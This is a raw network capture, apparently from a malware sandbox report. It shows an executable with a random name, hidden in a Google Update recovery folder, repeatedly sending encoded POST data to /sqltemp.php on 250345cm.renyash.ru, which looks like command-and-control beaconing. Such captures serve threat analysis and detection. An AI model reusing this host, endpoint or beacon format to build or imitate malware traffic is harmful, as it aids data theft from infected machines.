                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  140192.168.2.662779104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:54.097178936 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:03:54.455806971 CET1124OUTData Raw: 53 52 5a 50 54 51 54 56 58 56 52 59 56 5d 59 51 5b 5e 54 5a 55 54 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SRZPTQTVXVRYV]YQ[^TZUTP_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y$9X7<1%=+B;9> [0+9$>+ (=C%8:&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:03:54.550959110 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:54.720890999 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9sMiEjtdXerfJtfHI3V9plIEX6KsmNvMixphHazNcDhL2wPlCk2YVAuab%2F3m0GQb2RxhehLctKVEOqGn7BOGqUtvGjyatiAigP%2BZCWj82SAHglu7PTiDSTGLduYmMAeZMA7%2FnaAc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36615aa3243f2-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4813&min_rtt=1825&rtt_var=6661&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=56740&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  141192.168.2.662781104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:55.104376078 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:55.454268932 CET1124OUTData Raw: 53 50 5f 55 51 5b 54 5c 58 56 52 59 56 5c 59 51 5b 59 54 5d 55 5f 50 5f 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SP_UQ[T\XVRYV\YQ[YT]U_P_Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$%4='C8 0^?3>='#"#Z<8=B&#R::&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:55.549325943 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:55.730376005 CET800INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hBPgGKBX30u5Dg8Ru5kidHrsq1mnE7RbL4dxbXLPurLGdSWlhdUIoQEGL5xDBjTCOdjm7IxPCpRyKBlj%2FteHU3ZNL1WwT7fL0wGmlB8uCopf27zpSFRJtxiOvXYZPhV7hCEfl7ZD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3661be88042be-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4861&min_rtt=1788&rtt_var=6816&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=55361&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  142192.168.2.662782104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:55.871855021 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:56.220180035 CET1124OUTData Raw: 53 57 5f 50 51 58 54 50 58 56 52 59 56 5c 59 55 5b 53 54 50 55 5e 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SW_PQXTPXVRYV\YU[STPU^PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Z$X7/_3X7A8"4.$[*97)<Z T#\(5E1/S.&Y.,Y-5
                                                                                                                  Jan 1, 2025 16:03:56.336496115 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:56.513700008 CET816INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lP6oBaY3d%2FnzEWzQPsE3IRK6lIjxQTbvo%2FORB%2B4dO%2FFdzaGrznLWKHr9Dw4EX%2FvVyNmf6IAfL05i%2BnRKFBcvL3M4%2FtSmk%2B3ttT5O7dTEAd1T7GqI9IaoaKlb5Cky9f68VK%2BwklFa"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36620cb4543f4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4658&min_rtt=1901&rtt_var=6228&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=60929&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  143192.168.2.662783104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:56.648524046 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:57.001368999 CET1124OUTData Raw: 53 55 5a 57 54 5b 51 51 58 56 52 59 56 5b 59 52 5b 5a 54 5a 55 58 50 5e 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: SUZWT[QQXVRYV[YR[ZTZUXP^Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.Y3=[7?Y%-</)-R4$Y+>=$#3X?!$/9*&Y.,Y-)
                                                                                                                  Jan 1, 2025 16:03:57.117804050 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:57.295105934 CET800INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e77y4xqgKK85UY6OMB7GJfFLCcyTgqZxi7Q1%2B9HgQ3ypiZt0CRJVccdh6xDiyjkevFoa7tj5oU9zR1LWLVqwz3jaewlso7qNUCdJiYlyUBnupFaMLzBpoagQCPRokcBZo5Qt7HWv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36625affb4277-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4663&min_rtt=1704&rtt_var=6557&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=57532&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  144192.168.2.662784104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:57.617677927 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:57.969970942 CET1124OUTData Raw: 56 5f 5a 54 51 5b 51 50 58 56 52 59 56 51 59 54 5b 59 54 5b 55 55 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: V_ZTQ[QPXVRYVQYT[YT[UUP[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S-$Z4!\3;;=R!-([(_7*(Z#?85C%;-:&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:58.078419924 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:58.349231958 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:58 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K79C2g9eqaJWXhnGNZTaTo35yIAMJTPAP1TS%2FoRUaR5Nqk6Iw4mcTcxue80j%2BFamutbSK1TkWw0gXHa7tY3cDAxX1nDwfBtlVgGIIDIiPFcRAFVZju71IDPQ%2FPR30ksMo7PYjfrc"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb3662bbf502369-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3514&min_rtt=1962&rtt_var=3841&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=101508&cwnd=141&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  145192.168.2.662785104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:58.474450111 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  146192.168.2.662786104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:58.778578997 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1964
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:59.126214027 CET1964OUTData Raw: 56 56 5f 51 54 5f 51 50 58 56 52 59 56 5e 59 57 5b 5e 54 50 55 55 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VV_QT_QPXVRYV^YW[^TPUUPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.3/.7/!\$-#,&7#<<)-$ ?Z?+:&//::&Y.,Y-
                                                                                                                  Jan 1, 2025 16:03:59.223149061 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:59.489717960 CET960INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1z3Mu8%2FdQPCyvwNhHQJk7NTUoh%2Bel3AOAnDOPlA%2Fne3eKSSa3iBXsRAY1hAFnJnEbc8rQjjRPKLo%2BKz%2FfSEPUxjPOcO0c%2F7k6TMEYbmUC5z5hZB0CpVgceSWpMdgmIJ2hRkVnKAO"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36632dcc57c9a-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8699&min_rtt=2033&rtt_var=14096&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2266&delivery_rate=26369&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 00 1f 25 50 2a 2d 3e 1e 26 54 33 03 3f 3d 01 56 25 07 32 59 29 2b 29 01 30 58 23 58 2a 17 0d 10 36 02 26 01 26 38 2c 5a 23 03 09 5b 24 34 2b 59 05 1c 23 1d 36 01 20 12 2a 03 2c 05 32 06 21 59 24 3d 2b 05 28 3b 3c 11 20 28 2f 5e 33 3d 28 13 3e 39 2b 0e 27 2c 01 5e 3a 2c 22 0a 33 3a 2c 54 00 11 26 13 24 08 20 1b 20 37 0e 10 22 32 3d 13 25 1a 04 51 26 12 2f 19 37 39 2e 16 25 32 2b 5b 22 1d 2d 02 32 05 00 03 23 3d 24 0b 2a 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%P*->&T3?=V%2Y)+)0X#X*6&&8,Z#[$4+Y#6 *,2!Y$=+(;< (/^3=(>9+',^:,"3:,T&$ 7"2=%Q&/79.%2+["-2#=$*%S -H?WS0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  147192.168.2.662787104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:58.899485111 CET302OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 16:03:59.251163006 CET1124OUTData Raw: 56 51 5f 5d 51 5c 54 55 58 56 52 59 56 58 59 54 5b 5a 54 5f 55 5f 50 58 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQ_]Q\TUXVRYVXYT[ZT_U_PXZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.',54?>3>;)%R#-_<7W)-8Z#!<(+51/7V:&Y.,Y-%
                                                                                                                  Jan 1, 2025 16:03:59.352057934 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:03:59.622087002 CET807INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:03:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xZVWnOKSLc6qRxKWsbWXNXHBk5HlSBG566ZKgeNaEClAbq2O9hwyY2GvZzVG3xv6IbVjKdRuj%2BUBjyevJjqx3rSEpq4jif%2Br0SSEhGhtDA40RdphxG%2B8xJTKwYokCSmr6HO2%2FmOm"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb36633aeeb8ca8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8364&min_rtt=1979&rtt_var=13513&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1426&delivery_rate=27514&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  148192.168.2.662788104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:03:59.771250010 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:04:00.126471996 CET1124OUTData Raw: 56 51 5f 51 54 5e 51 52 58 56 52 59 56 5d 59 55 5b 58 54 50 55 5b 50 5b 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VQ_QT^QRXVRYV]YU[XTPU[P[Z_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^$/X7&38:=S!=?*9+)]7/]+;%1$-*&Y.,Y-1
                                                                                                                  Jan 1, 2025 16:04:00.229738951 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:04:00.412200928 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 15:04:00 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VZjHqK5b96V%2FPipFehaf5xIk31y7VwCxcd1DuRPceFLOA0D6q4JlzRBAjHuN5nML%2B%2BS4dvNrvhYFLj84vYrNkPxcaxXnjYWSE5Q0B3w%2BCGXM5Fq1k6iy8E06pVGZ3B%2Fsq2VTcOHD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb366392c1842f4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8109&min_rtt=1813&rtt_var=13273&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1402&delivery_rate=27977&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 42W\X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  149192.168.2.662789104.21.38.84807048C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 16:04:00.535706997 CET278OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                  Host: 250345cm.renyash.ru
                                                                                                                  Content-Length: 1124
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 16:04:00.892158031 CET1124OUTData Raw: 56 52 5a 50 51 5a 51 56 58 56 52 59 56 5f 59 53 5b 52 54 5c 55 54 50 5a 5a 5f 59 5c 54 58 55 5c 59 59 57 52 58 59 5a 5c 58 58 54 59 59 52 54 5d 53 50 5a 49 5a 5a 56 5e 51 58 51 58 5b 5e 57 5e 5a 5f 5e 5d 56 59 56 51 5e 5a 59 5f 5f 58 42 5e 54 5b
                                                                                                                  Data Ascii: VRZPQZQVXVRYV_YS[RT\UTPZZ_Y\TXU\YYWRXYZ\XXTYYRT]SPZIZZV^QXQX[^W^Z_^]VYVQ^ZY__XB^T[SV_YU]S]RQ_]VPS\\]\PB][RZ[\TC_X@TQXYYU]^X][W\[__X_[V[_X[URTXZPZ\TAPST^BXG^V^ZQA^^FP]U[U[P^U_TWYRZQX^]S.^$" -]'.$8U78X*);R><#4+A1,<,*&Y.,Y-9
                                                                                                                  Jan 1, 2025 16:04:00.985563993 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 16:04:01.164676905 CET804INHTTP/1.1 200 OK
